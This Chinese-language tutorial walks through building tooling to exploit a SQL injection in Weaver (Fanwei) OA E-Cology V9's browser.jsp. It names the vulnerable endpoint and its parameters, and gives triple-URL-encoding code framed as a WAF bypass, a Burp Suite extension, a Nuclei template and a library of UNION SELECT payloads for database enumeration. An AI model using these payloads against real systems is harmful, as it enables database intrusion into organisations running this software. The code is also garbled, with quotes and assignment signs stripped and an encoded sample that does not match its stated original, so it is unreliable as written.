自动化利器Python脚本高效构建泛微OA E-Cology V9漏洞检测工具当安全测试人员面对泛微OA这类广泛使用的企业级系统时手动构造复杂的URL编码和SQL注入语句不仅耗时耗力还容易出错。本文将带你开发一个智能化的Python工具彻底告别手工操作的低效模式。1. 漏洞原理与自动化需求分析泛微OA E-Cology V9的browser.jsp文件存在SQL注入漏洞攻击者可通过精心构造的请求获取数据库信息。传统手动测试存在三大痛点编码复杂度高需要三次URL全字符编码转换测试效率低每次修改参数都要重新编码易出错手工编码容易遗漏特殊字符# 典型的三次URL编码过程示例 original a union select 1,(SELECT VERSION) first_encode %61%27%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%27%27%2b%28%53%45%4c%45%43%54%20%40%40%56%45%52%53%49%4f%4e%29%2b%27 second_encode %25%36%31%25%32%37%25%32%30%25%37%35%25%36%65%25%36%39%25%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%32%37%25%32%37%25%32%62%25%32%38%25%35%33%25%34%35%25%34%63%25%34%35%25%34%33%25%35%34%25%32%30%25%34%30%25%34%30%25%35%36%25%34%35%25%35%32%25%35%33%25%34%39%25%34%66%25%34%65%25%32%39%25%32%62%25%32%37 third_encode %25%32%35%25%33%36%25%33%31%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%35%25%32%35%25%33%36%25%36%35%25%32%35%25%33%36%25%33%39%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%65%25%32%35%25%33%32%25%33%30%25%32%35%25%33%37%25%33%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%36%33%25%32%35%25%33%36%25%33%35%25%32%35%25%33%36%25%33%33%25%32%35%25%33%37%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%33%25%33%31%25%32%35%25%33%32%25%36%33%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%33%37%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%38%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%36%33%25%32%35%25%33%34%25%33%35%25%32%35%25%33%34%25%33%33%25%32%35%25%33%35%25%33%34%25%32%35%25%33%32%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%34%25%33%30%25%32%35%25%33%35%25%33%36%25%32%35%25%33%34%25%33%35%25%32%35%25%33%35%25%33%32%25%32%35%25%33%35%25%33%33%25%32%35%25%33%34%25%33%39%25%32%35%25%33%34%25%36%36%25%32%35%25%33%34%25%36%65%25%32%35%25%33%32%25%33%39%25%32%35%25%33%32%25%36%32%25%32%35%25%33%32%25%33%37提示三次URL编码是绕过WAF的常见技术但手工操作极易出错这正是自动化脚本的价值所在。2. 核心脚本开发智能编码生成器我们首先构建一个可交互的编码转换工具支持多种SQL注入语句的自动生成。import urllib.parse class TripleEncoder: def __init__(self): self.common_payloads { 1: a union select 1,(SELECT VERSION), 2: a union select 1,db_name(), 3: a union select 1,user } def triple_encode(self, text): for _ in range(3): text urllib.parse.quote(text, safe) return text def generate_payload(self, payload_typeNone, custom_sqlNone): if custom_sql: base custom_sql else: base self.common_payloads.get(payload_type, ) return self.triple_encode(base)关键功能设计预设常用Payload内置数据库版本、当前库名、当前用户等常见检测语句自定义SQL支持允许输入任意SQL语句进行编码严格编码规则确保每个字符都经过三次编码3. 高级功能扩展BurpSuite集成将脚本输出直接集成到BurpSuite中可以极大提升测试效率。import sys from burp import IBurpExtender from burp import IContextMenuFactory class BurpExtender(IBurpExtender, IContextMenuFactory): def registerExtenderCallbacks(self, callbacks): self._callbacks callbacks self._helpers callbacks.getHelpers() callbacks.setExtensionName(Fanwei OA AutoEncoder) callbacks.registerContextMenuFactory(self) def createMenuItems(self, context_menu_invocation): menu_list [] menu_list.append(JMenuItem(Generate Fanwei Payload, actionPerformedlambda x: self.generate_payload(context_menu_invocation))) return menu_list def generate_payload(self, invocation): selected_text self._helpers.bytesToString( invocation.getSelectedMessages()[0].getRequest()) encoder TripleEncoder() encoded encoder.triple_encode(selected_text) # 将结果写入Burp的Repeater模块 new_request self._helpers.buildHttpMessage( invocation.getSelectedMessages()[0].getRequest().getHeaders(), self._helpers.stringToBytes(encoded)) self._callbacks.sendToRepeater( invocation.getSelectedMessages()[0].getHttpService().getHost(), invocation.getSelectedMessages()[0].getHttpService().getPort(), False, new_request, Fanwei AutoEncoded)集成后的工作流程在BurpSuite中选中需要编码的文本右键选择Generate Fanwei Payload自动生成三次编码后的请求并发送到Repeater4. 自动化测试框架整合将脚本输出与Nuclei等自动化测试工具结合实现批量检测。# FanWeiOA_E-Cology9_browser_SQL.yaml 示例 id: fanwei-oa-browser-sqli info: name: Fanwei OA E-Cology V9 browser.jsp SQL Injection author: yourname severity: high description: SQL Injection in browser.jsp file requests: - method: POST path: /mobile/%20/plugin/browser.jsp headers: Content-Type: application/x-www-form-urlencoded body: isDis1browserTypeId269keyword{{payload}} payloads: payload: - {{interactsh-url}} - a union select 1,(SELECT VERSION)配套的Python脚本可以自动生成符合Nuclei模板要求的编码后Payloaddef generate_nuclei_template(payloads): template id: fanwei-oa-browser-sqli info: name: Fanwei OA E-Cology V9 browser.jsp SQL Injection severity: high requests: - method: POST path: /mobile/%20/plugin/browser.jsp headers: Content-Type: application/x-www-form-urlencoded body: isDis1browserTypeId269keyword{encoded_payload} encoder TripleEncoder() for payload in payloads: encoded encoder.triple_encode(payload) print(template.format(encoded_payloadencoded))5. 实战技巧与异常处理在实际使用中有几个关键点需要注意编码一致性检查确保每次编码结果可预测特殊字符处理单引号、空格等需要特别注意错误调试当请求失败时的排查方法def validate_encoding(input_str): encoder TripleEncoder() encoded encoder.triple_encode(input_str) # 解码验证 decoded encoded for _ in range(3): decoded urllib.parse.unquote(decoded) if decoded input_str: print(验证通过编码/解码循环一致) else: print(f验证失败原始 {input_str} ≠ 解码后 {decoded}) return encoded常见问题解决指南问题现象可能原因解决方案服务器返回500错误编码次数不足确保执行三次完整编码无预期响应SQL语句语法错误先在SQL客户端测试语句有效性被WAF拦截特征太明显尝试调整语句结构或添加注释在实际项目中我发现最实用的技巧是建立一个Payload库将验证有效的各种SQL语句保存起来方便后续测试直接调用。例如payload_library { version_mssql: a union select 1,(SELECT VERSION), version_mysql: a union select 1,version, tables_mssql: a union select 1,table_name from information_schema.tables, current_user: a union select 1,user }通过这种方式可以快速构建针对不同数据库类型的检测方案而无需每次都从头开始编写SQL语句。